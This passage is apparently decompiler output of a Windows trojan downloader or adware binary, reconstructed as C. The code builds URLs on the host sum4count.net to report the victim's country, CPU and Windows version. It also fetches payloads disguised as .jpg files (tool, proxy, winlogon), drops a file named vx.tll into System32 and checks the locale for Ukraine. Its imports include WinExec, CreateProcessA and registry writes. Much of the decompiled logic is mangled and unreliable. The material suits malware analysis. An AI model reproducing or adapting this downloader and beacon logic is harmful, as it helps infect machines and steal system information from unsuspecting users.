    struct _SYSTEMTIME * v20 = (struct _SYSTEMTIME *)&lpSystemTime; // bp-3828, 0x40221f
    GetSystemTime((struct _SYSTEMTIME *)&lpSystemTime);
    uint32_t v21 = function_4015e5(v11); // 0x402227
    uint32_t v22 = function_4015e5(v14); // 0x402233
    uint32_t v23 = v21 / 256; // 0x40223c
    int32_t v24 = (char)v23 != 0 ? v23 : v23 + 48;
    char v25 = v22 / 256;
    char v26 = v25 != 0 ? v25 : v25 + 48;
    wsprintfA((char *)&lpOut12, "%s&code2=%c%c%c%c", &lpOut12, (char)v22, (char)v21, (char)v24, v26);
    int32_t len = strlen((char *)&lpOut6); // 0x402282
    int32_t v27 = (int32_t)&v20; // 0x402287
    int32_t * v28; // 0x401fc2
    if (len == 0) {
        // 0x402252
        v28 = (int32_t *)(v27 - 4);
    } else {
        int32_t * v29 = (int32_t *)(v27 - 4);
        int32_t v30 = 0; // 0x40229c
        char * v31 = (char *)(v9 - 596 + v30); // 0x40228e
        *v31 = *v31 - 1;
        *v29 = (int32_t)&lpOut6;
        v30++;
        uint32_t len2 = strlen((char *)&g1); // 0x40229d
        v28 = v29;
        while (v30 < len2) {
            // 0x40228e
            v31 = (char *)(v9 - 596 + v30);
            *v31 = *v31 - 1;
            *v29 = (int32_t)&lpOut6;
            v30++;
            len2 = strlen((char *)&g1);
            v28 = v29;
        }
    }
    int32_t v32 = &lpOut7; // 0x4022af
    *v28 = v32;
    if (strlen((char *)&g1) != 0) {
        for (int32_t i = 0; i < strlen((char *)&g1); i++) {
            char * v33 = (char *)(v9 - 340 + i); // 0x4022ba
            *v33 = *v33 - 1;
            *v28 = v32;
        }
    }
    int32_t v34 = &lpOut8; // 0x4022db
    *v28 = v34;
    if (strlen((char *)&g1) != 0) {
        for (int32_t i = 0; i < strlen((char *)&g1); i++) {
            char * v35 = (char *)(v9 - 1576 + i); // 0x4022e6
            *v35 = *v35 - 1;
            *v28 = v34;
        }
    }
    int32_t v36 = &lpOut9; // 0x402307
    *v28 = v36;
    if (strlen((char *)&g1) != 0) {
        for (int32_t i = 0; i < strlen((char *)&g1); i++) {
            char * v37 = (char *)(v9 - 2088 + i); // 0x402312
            *v37 = *v37 - 1;
            *v28 = v36;
        }
    }
    int32_t v38 = &lpOut10; // 0x402333
    *v28 = v38;
    if (strlen((char *)&g1) != 0) {
        for (int32_t i = 0; i < strlen((char *)&g1); i++) {
            char * v39 = (char *)(v9 - 1320 + i); // 0x40233e
            *v39 = *v39 - 1;
            *v28 = v38;
        }
    }
    // 0x402357
    *v28 = 0x404328;
    int32_t * v40 = (int32_t *)(v27 - 8); // 0x402368
    int32_t v41 = &lpLCData2; // 0x402368
    *v40 = v41;
    int32_t v42; // 0x401fc2
    int32_t v43; // 0x401fc2
    int32_t * v44; // 0x401fc2
    int32_t v45; // 0x401fc2
    if (_stricmp((char *)&g1, (char *)&g1) == 0) {
        goto lab_0x4023e3;
    } else {
        // 0x402371
        *v28 = (int32_t)"Ukraine";
        *v40 = v41;
        if (_stricmp((char *)&g1, (char *)&g1) == 0) {
            goto lab_0x4023e3;
        } else {
            int32_t v46 = &lpOut11;
            *v28 = v46;
            *v40 = v32;
            int32_t v47 = &lpOut6;
            *(int32_t *)(v27 - 12) = v47;
            *(int32_t *)(v27 - 16) = (int32_t)"%s%s%ssearch.jpg";
            *(int32_t *)(v27 - 20) = (int32_t)"http://sum4count.net/pic/null.jpg";
            wsprintfA((char *)&g1, (char *)&g1);
            *(int32_t *)(v27 - 24) = v46;
            *(int32_t *)(v27 - 28) = v32;
            *(int32_t *)(v27 - 32) = v47;
            *(int32_t *)(v27 - 36) = (int32_t)"%s%s%swinlogon.jpg";
            *(int32_t *)(v27 - 40) = (int32_t)"http://sum4count.net/pic/null.jpg";
            wsprintfA((char *)&g1, (char *)&g1);
            *(int32_t *)(v27 - 44) = v46;
            *(int32_t *)(v27 - 48) = v32;
            *(int32_t *)(v27 - 52) = v47;
            int32_t v48 = v27 - 56; // 0x4023dc
            int32_t * v49 = (int32_t *)v48;
            *v49 = (int32_t)"%s%s%stibs.jpg";
            v44 = v49;
            v43 = v47;
            v42 = v46;
            v45 = v48;
            goto lab_0x402438;
        }
    }
  lab_0x4023e3:;
    int32_t v50 = &lpOut11;
    *v28 = v50;
    *v40 = v32;
    int32_t v51 = &lpOut6;
    *(int32_t *)(v27 - 12) = v51;
    *(int32_t *)(v27 - 16) = (int32_t)"%s%s%snull.jpg";
    *(int32_t *)(v27 - 20) = (int32_t)"http://sum4count.net/pic/null.jpg";
    wsprintfA((char *)&g1, (char *)&g1);
    *(int32_t *)(v27 - 24) = v50;
    *(int32_t *)(v27 - 28) = v32;
    *(int32_t *)(v27 - 32) = v51;
    *(int32_t *)(v27 - 36) = (int32_t)"%s%s%snull.jpg";
    *(int32_t *)(v27 - 40) = (int32_t)"http://sum4count.net/pic/null.jpg";
    wsprintfA((char *)&g1, (char *)&g1);
    *(int32_t *)(v27 - 44) = v50;
    *(int32_t *)(v27 - 48) = v32;
    *(int32_t *)(v27 - 52) = v51;
    int32_t v52 = v27 - 56; // 0x402437
    int32_t * v53 = (int32_t *)v52;
    *v53 = (int32_t)"%s%s%snull.jpg";
    v44 = v53;
    v43 = v51;
    v42 = v50;
    v45 = v52;
    goto lab_0x402438;
  lab_0x402438:;
    int32_t * v54 = (int32_t *)(v45 - 4); // 0x402438
    *v54 = (int32_t)"http://sum4count.net/pic/null.jpg";
    wsprintfA((char *)&g1, (char *)&g1);
    int32_t * v55 = (int32_t *)(v45 - 8); // 0x402445
    *v55 = v42;
    int32_t * v56 = (int32_t *)(v45 - 12); // 0x40244c
    *v56 = v32;
    int32_t * v57 = (int32_t *)(v45 - 16); // 0x402453
    *v57 = v43;
    int32_t * v58 = (int32_t *)(v45 - 20); // 0x402454
    *v58 = (int32_t)"%s%s%stool.jpg";
    int32_t * v59 = (int32_t *)(v45 - 24); // 0x402459
    *v59 = (int32_t)"http://sum4count.net/pic/tool.jpg";
    wsprintfA((char *)&g1, (char *)&g1);
    int32_t * v60 = (int32_t *)(v45 + 52); // 0x402469
    *v60 = v42;
    int32_t * v61 = (int32_t *)(v45 + 48); // 0x402470
    *v61 = v32;
    int32_t * v62 = (int32_t *)(v45 + 44); // 0x402477
    *v62 = v43;
    int32_t * v63 = (int32_t *)(v45 + 40); // 0x402478
    *v63 = (int32_t)"%s%s%sproxy.jpg";
    int32_t * v64 = (int32_t *)(v45 + 36); // 0x40247d
    *v64 = (int32_t)"http://sum4count.net/pic/proxy.jpg";
    wsprintfA((char *)&g1, (char *)&g1);
    int32_t v65 = &lpOut12; // 0x40248d
    *v60 = v65;
    *v61 = v32;
    *v62 = v43;
    *v63 = (int32_t)"%s%s/rftghjkljhgfdsdfgh.php%s";
    *v64 = (int32_t)"http://sum4count.net/rftghjkljhgfdsdfgh.php?adv=&code1=HNIC&code2=1100";
    wsprintfA((char *)&g1, (char *)&g1);
    int32_t * v66 = (int32_t *)(v45 + 32); // 0x4024ae
    *v66 = v65;
    int32_t * v67 = (int32_t *)(v45 + 28); // 0x4024b5
    *v67 = 99;
    int32_t * v68 = (int32_t *)(v45 + 24); // 0x4024b7
    *v68 = v32;
    int32_t * v69 = (int32_t *)(v45 + 20); // 0x4024be
    *v69 = v43;
    int32_t * v70 = (int32_t *)(v45 + 16); // 0x4024bf
    *v70 = (int32_t)"%s%s/qwertyuiyw12ertyuytre/adv%u.php%s&code3=";
    int32_t v71 = v45 + 12; // 0x4024c4
    int32_t * v72 = (int32_t *)v71; // 0x4024c4
    *v72 = (int32_t)"http://sum4count.net/qwertyuiyw12ertyuytre/adv.php?adv=&code1=HNIC&code2=1100&code3=";
    wsprintfA((char *)&g1, (char *)&g1);
    int32_t * v73 = (int32_t *)(v45 + 8);
    *v73 = 99;
    *(int32_t *)(v45 + 4) = (int32_t)&lpOut5;
    *v44 = (int32_t)&lpOut3;
    *v54 = (int32_t)&lpOut2;
    *v55 = (int32_t)&lpOut4;
    *v56 = v41;
    *v57 = v38;
    *v58 = 99;
    *v59 = v34;
    *(int32_t *)(v45 - 28) = v32;
    *(int32_t *)(v45 - 32) = v43;
    *(int32_t *)(v45 - 36) = (int32_t)"%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u";
    *(int32_t *)(v45 - 40) = (int32_t)"http://sum4count.net/adv/0/adload.php?a1=United States&a2=Type of Procfssor: PENTIUM PRO or PENTIUM II/III&a3=Windowd versign is 5.1&a4=Build: 2600, Platform ID: d&a5=ntoutpost&table=adv";
    wsprintfA((char *)&g1, (char *)&g1);
    *v60 = (int32_t)&lpBuffer;
    *v61 = (int32_t)"%s\\vx.tll";
    *v62 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\vx.tll";
    wsprintfA((char *)&g1, (char *)&g1);
    function_40134e();
    int32_t v74; // bp-24, 0x401fc2
    *v60 = (int32_t)&v74;
    *v61 = 0;
    *v62 = 0;
    *v63 = 0x401604;
    *v64 = 0;
    *v66 = 0;
    int32_t * threadHandle = CreateThread((struct _SECURITY_ATTRIBUTES *)&g1, (int32_t)&g1, (int32_t (*)(int32_t *))&g1, &g1, (int32_t)&g1, &g1); // 0x402545
    *v67 = (int32_t)threadHandle;
    CloseHandle(&g1);
    *v68 = 0;
    *v69 = 0;
    *v70 = 0;
    int32_t v75; // bp-52, 0x401fc2
    int32_t v76 = &v75; // 0x40255e
    *v72 = v76;
    bool v77 = GetMessageA((struct tagMSG *)&g1, &g1, (int32_t)&g1, (int32_t)&g1); // 0x40255f
    if (!v77) {
        // 0x402582
        *v73 = 1;
        return 1;
    }
    *v73 = v76;
    TranslateMessage((struct tagMSG *)&g1);
    *(int32_t *)(v71 - 8) = v76;
    DispatchMessageA((struct tagMSG *)&g1);
    *(int32_t *)(v71 - 12) = 0;
    *(int32_t *)(v71 - 16) = 0;
    *(int32_t *)(v71 - 20) = 0;
    int32_t v78 = v71 - 24; // 0x40257f
    *(int32_t *)v78 = v76;
    bool v79 = GetMessageA((struct tagMSG *)&g1, &g1, (int32_t)&g1, (int32_t)&g1); // 0x40255f
    int32_t * v80 = (int32_t *)(v71 - 28);
    int32_t v81 = v78; // 0x402563
    while (v79) {
        // 0x402565
        *v80 = v76;
        TranslateMessage((struct tagMSG *)&g1);
        *(int32_t *)(v81 - 8) = v76;
        DispatchMessageA((struct tagMSG *)&g1);
        *(int32_t *)(v81 - 12) = 0;
        *(int32_t *)(v81 - 16) = 0;
        *(int32_t *)(v81 - 20) = 0;
        v78 = v81 - 24;
        *(int32_t *)v78 = v76;
        v79 = GetMessageA((struct tagMSG *)&g1, &g1, (int32_t)&g1, (int32_t)&g1);
        v80 = (int32_t *)(v81 - 28);
        v81 = v78;
    }
    // 0x402582
    *v80 = 1;
    return 1;
}

// Address range: 0x40258c - 0x402592
int32_t function_40258c(int32_t wLang, char * szLang, int32_t cchLang) {
    // 0x40258c
    return VerLanguageNameA(wLang, szLang, cchLang);
}

// Address range: 0x402592 - 0x402598
int32_t function_402592(char * s) {
    // 0x402592
    return strlen(s);
}

// Address range: 0x402598 - 0x40259e
char * function_402598(char * dest, char * src) {
    // 0x402598
    return strcpy(dest, src);
}

// Address range: 0x40259e - 0x4025a4
int32_t * function_40259e(int32_t * s, int32_t c, int32_t n) {
    // 0x40259e
    return memset(s, c, n);
}

// Address range: 0x4025a4 - 0x4026e2
int32_t function_4025a4(void) {
    int32_t v1 = __readfsdword(0); // bp-20, 0x4025b9
    __writefsdword(0, (int32_t)&v1);
    __set_app_type(2);
    *(int32_t *)0x405cb4 = -1;
    *(int32_t *)0x405cb8 = -1;
    *__p__fmode() = *(int32_t *)0x405cb0;
    *__p__commode() = *(int32_t *)0x405cac;
    *(int32_t *)0x405cbc = *(int32_t *)*(int32_t *)0x4030e0;
    function_402723();
    if (*(int32_t *)0x404470 == 0) {
        // 0x40261b
        __setusermatherr(0x402720);
    }
    // 0x402627
    function_40270e();
    _initterm((void (**)())0x404008, (void (**)())0x40400c);
    int32_t v2 = *(int32_t *)0x405ca8; // bp-112, 0x402640
    int32_t v3 = *(int32_t *)0x405ca4; // 0x402647
    int32_t v4; // bp-100, 0x4025a4
    int32_t v5; // bp-104, 0x4025a4
    int32_t v6; // bp-116, 0x4025a4
    __getmainargs(&v4, (char ***)&v6, (char ***)&v5, v3, &v2);
    _initterm((void (**)())0x404000, (void (**)())0x404004);
    int32_t v7 = *(int32_t *)*(int32_t *)0x4030d0; // 0x402676
    unsigned char v8 = *(char *)v7; // 0x40267b
    int32_t v9 = v7; // 0x40267e
    char v10; // 0x4025a4
    int32_t v11; // 0x4025a4
    int32_t v12; // 0x4025a4
    if (v8 != 34) {
        char v13 = v8; // 0x4026bd
        int32_t v14 = v7; // 0x4026bd
        if (v8 >= 33) {
            int32_t v15 = v7 + 1;
            unsigned char v16 = *(char *)v15;
            v13 = v16;
            v14 = v15;
            int32_t v17 = v15; // 0x4026bd
            while (v16 >= 33) {
                // 0x4026ba
                v15 = v17 + 1;
                v16 = *(char *)v15;
                v13 = v16;
                v14 = v15;
                v17 = v15;
            }
        }
        // 0x402697
        v10 = v13;
        v12 = v14;
        goto lab_0x402697;
    } else {
        v9++;
        char v18 = *(char *)v9; // 0x402684
        while (v18 != 0 == (v18 != 34)) {
            // 0x402680
            v9++;
            v18 = *(char *)v9;
        }
        // 0x40268e
        v11 = v9;
        v10 = v18;
        v12 = v9;
        if (v18 != 34) {
            goto lab_0x402697;
        } else {
            goto lab_0x402693;
        }
    }
  lab_0x402697:
    // 0x402697
    v11 = v12;
    if (v10 >= 33) {
        // 0x4026a1
        int32_t lpStartupInfo; // bp-96, 0x4025a4
        GetStartupInfoA((struct _STARTUPINFOA *)&lpStartupInfo);
        int32_t * moduleHandle = GetModuleHandleA(NULL); // 0x4026cc
        exit(function_401fc2((int32_t)moduleHandle));
        // UNREACHABLE
    }
    goto lab_0x402693;
  lab_0x402693:;
    int32_t v19 = v11 + 1; // 0x402693
    v10 = *(char *)v19;
    v12 = v19;
    goto lab_0x402697;
}

// Address range: 0x4026e2 - 0x4026f6
int32_t function_4026e2(void) {
    // 0x4026e2
    int32_t v1; // 0x4026e2
    int32_t * v2 = (int32_t *)*(int32_t *)(v1 - 20); // 0x4026e5
    int32_t v3 = *(int32_t *)*v2; // 0x4026e7
    *(int32_t *)(v1 - 120) = v3;
    return _XcptFilter(v3, v2);
}

// Address range: 0x402702 - 0x402708
int32_t function_402702(int32_t xcptnum, int32_t * pxcptinfoptrs) {
    // 0x402702
    return _XcptFilter(xcptnum, pxcptinfoptrs);
}

// Address range: 0x402708 - 0x40270e
void function_402708(void (**First)(), void (**Last)()) {
    // 0x402708
    _initterm(First, Last);
}

// Address range: 0x40270e - 0x402720
int32_t function_40270e(void) {
    // 0x40270e
    return _controlfp(0x10000, 0x30000);
}

// Address range: 0x402720 - 0x402723
int32_t function_402720(void) {
    // 0x402720
    return 0;
}

// Address range: 0x402723 - 0x402724
int32_t function_402723(void) {
    // 0x402723
    int32_t result; // 0x402723
    return result;
}

// Address range: 0x402730 - 0x402736
int32_t function_402730(struct _EXCEPTION_RECORD * exception_record, int32_t registration, struct _CONTEXT * context, int32_t dispatcher) {
    // 0x402730
    return _except_handler3(exception_record, registration, context, dispatcher);
}

// Address range: 0x402736 - 0x40273c
int32_t function_402736(int32_t NewValue, int32_t Mask) {
    // 0x402736
    return _controlfp(NewValue, Mask);
}

// --------------- Dynamically Linked Functions ---------------

// int __getmainargs(int * Argc, char *** Argv, char *** Env, int DoWildCard, _startupinfo * StartInfo);
// int * __cdecl __p__commode(void);
// int * __cdecl __p__fmode(void);
// void __set_app_type(int at);
// void __setusermatherr(_HANDLE_MATH_ERROR pf);
// unsigned int __cdecl _controlfp(_In_ unsigned int NewValue, _In_ unsigned int Mask);
// int _except_handler3(PEXCEPTION_RECORD exception_record, PEXCEPTION_REGISTRATION registration, PCONTEXT context, PEXCEPTION_REGISTRATION dispatcher);
// void __cdecl _initterm(_In_ _PVFV * First, _In_ _PVFV * Last);
// void __cdecl _splitpath(_In_z_ char const * FullPath, char * Drive, char * Dir, char * Filename, char * Ext);
// int __cdecl _stricmp(_In_z_ char const * String1, _In_z_ char const * String2);
// int _XcptFilter(unsigned long xcptnum, void * pxcptinfoptrs);
// BOOL CloseHandle(_In_ HANDLE hObject);
// BOOL CopyFileA(_In_ LPCSTR lpExistingFileName, _In_ LPCSTR lpNewFileName, _In_ BOOL bFailIfExists);
// HANDLE CreateFileA(_In_ LPCSTR lpFileName, _In_ DWORD dwDesiredAccess, _In_ DWORD dwShareMode, _In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes, _In_ DWORD dwCreationDisposition, _In_ DWORD dwFlagsAndAttributes, _In_opt_ HANDLE hTemplateFile);
// BOOL CreateProcessA(_In_opt_ LPCSTR lpApplicationName, _Inout_opt_ LPSTR lpCommandLine, _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, _In_ BOOL bInheritHandles, _In_ DWORD dwCreationFlags, _In_opt_ LPVOID lpEnvironment, _In_opt_ LPCSTR lpCurrentDirectory, _In_ LPSTARTUPINFOA lpStartupInfo, _Out_ LPPROCESS_INFORMATION lpProcessInformation);
// HANDLE CreateSemaphoreA(_In_opt_ LPSECURITY_ATTRIBUTES lpSemaphoreAttributes, _In_ LONG lInitialCount, _In_ LONG lMaximumCount, _In_opt_ LPCSTR lpName);
// HANDLE CreateThread(_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, _In_ SIZE_T dwStackSize, _In_ LPTHREAD_START_ROUTINE lpStartAddress, _In_opt_ LPVOID lpParameter, _In_ DWORD dwCreationFlags, _Out_opt_ LPDWORD lpThreadId);
// BOOL DeleteFileA(_In_ LPCSTR lpFileName);
// LRESULT DispatchMessageA(_In_ const MSG * lpMsg);
// void exit(int status);
// DWORD ExpandEnvironmentStringsA(_In_ LPCSTR lpSrc, LPSTR lpDst, _In_ DWORD nSize);
// BOOL FreeLibrary(_In_ HMODULE hLibModule);
// BOOL GetExitCodeThread(_In_ HANDLE hThread, _Out_ LPDWORD lpExitCode);
// DWORD GetFileAttributesA(_In_ LPCSTR lpFileName);
// DWORD GetFileSize(_In_ HANDLE hFile, _Out_opt_ LPDWORD lpFileSizeHigh);
// DWORD GetLastError(VOID);
// int GetLocaleInfoA(_In_ LCID Locale, _In_ LCTYPE LCType, LPSTR lpLCData, _In_ int cchData);
// BOOL GetMessageA(_Out_ LPMSG lpMsg, _In_opt_ HWND hWnd, _In_ UINT wMsgFilterMin, _In_ UINT wMsgFilterMax);
// DWORD GetModuleFileNameA(_In_opt_ HMODULE hModule, LPSTR lpFilename, _In_ DWORD nSize);
// HMODULE GetModuleHandleA(_In_opt_ LPCSTR lpModuleName);
// FARPROC GetProcAddress(_In_ HMODULE hModule, _In_ LPCSTR lpProcName);
// VOID GetStartupInfoA(_Out_ LPSTARTUPINFOA lpStartupInfo);
// LANGID GetSystemDefaultLangID(void);
// LCID GetSystemDefaultLCID(void);
// UINT GetSystemDirectoryA(LPSTR lpBuffer, _In_ UINT uSize);
// VOID GetSystemInfo(_Out_ LPSYSTEM_INFO lpSystemInfo);
// VOID GetSystemTime(_Out_ LPSYSTEMTIME lpSystemTime);
// DWORD GetTempPathA(_In_ DWORD nBufferLength, LPSTR lpBuffer);
// NOT_BUILD_WINDOWS_DEPRECATE BOOL GetVersionExA(_Inout_ LPOSVERSIONINFOA lpVersionInformation);
// HMODULE LoadLibraryA(_In_ LPCSTR lpLibFileName);
// HLOCAL LocalAlloc(_In_ UINT uFlags, _In_ SIZE_T uBytes);
// HLOCAL LocalFree(HLOCAL hMem);
// LPSTR lstrcpyA(LPSTR lpString1, _In_ LPCSTR lpString2);
// void * memset(void * s, int c, size_t n);
// BOOL ReadFile(_In_ HANDLE hFile, LPVOID lpBuffer, _In_ DWORD nNumberOfBytesToRead, _Out_opt_ LPDWORD lpNumberOfBytesRead, _Inout_opt_ LPOVERLAPPED lpOverlapped);
// LSTATUS RegCreateKeyA(_In_ HKEY hKey, _In_opt_ LPCSTR lpSubKey, _Out_ PHKEY phkResult);
// LSTATUS RegFlushKey(_In_ HKEY hKey);
// LSTATUS RegOpenKeyExA(_In_ HKEY hKey, _In_opt_ LPCSTR lpSubKey, _In_opt_ DWORD ulOptions, _In_ REGSAM samDesired, _Out_ PHKEY phkResult);
// LSTATUS RegSetValueExA(_In_ HKEY hKey, _In_opt_ LPCSTR lpValueName, DWORD Reserved, _In_ DWORD dwType, const BYTE * lpData, _In_ DWORD cbData);
// DWORD SetFilePointer(_In_ HANDLE hFile, _In_ LONG lDistanceToMove, _Inout_opt_ PLONG lpDistanceToMoveHigh, _In_ DWORD dwMoveMethod);
// VOID Sleep(_In_ DWORD dwMilliseconds);
// char * strcpy(char * restrict dest, const char * restrict src);
// size_t strlen(const char * s);
// BOOL TranslateMessage(_In_ const MSG * lpMsg);
// DWORD VerLanguageNameA(_In_ DWORD wLang, LPSTR szLang, _In_ DWORD cchLang);
// LPVOID VirtualAlloc(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect);
// BOOL VirtualFree(LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD dwFreeType);
// DWORD WaitForSingleObject(_In_ HANDLE hHandle, _In_ DWORD dwMilliseconds);
// UINT WinExec(_In_ LPCSTR lpCmdLine, _In_ UINT uCmdShow);
// BOOL WriteFile(_In_ HANDLE hFile, LPCVOID lpBuffer, _In_ DWORD nNumberOfBytesToWrite, _Out_opt_ LPDWORD lpNumberOfBytesWritten, _Inout_opt_ LPOVERLAPPED lpOverlapped);
// int wsprintfA(_Out_ LPSTR, _In_ LPCSTR, ...);

// --------------------- Meta-Information ---------------------

// Detected compiler/packer: microsoft
// Detected functions: 24
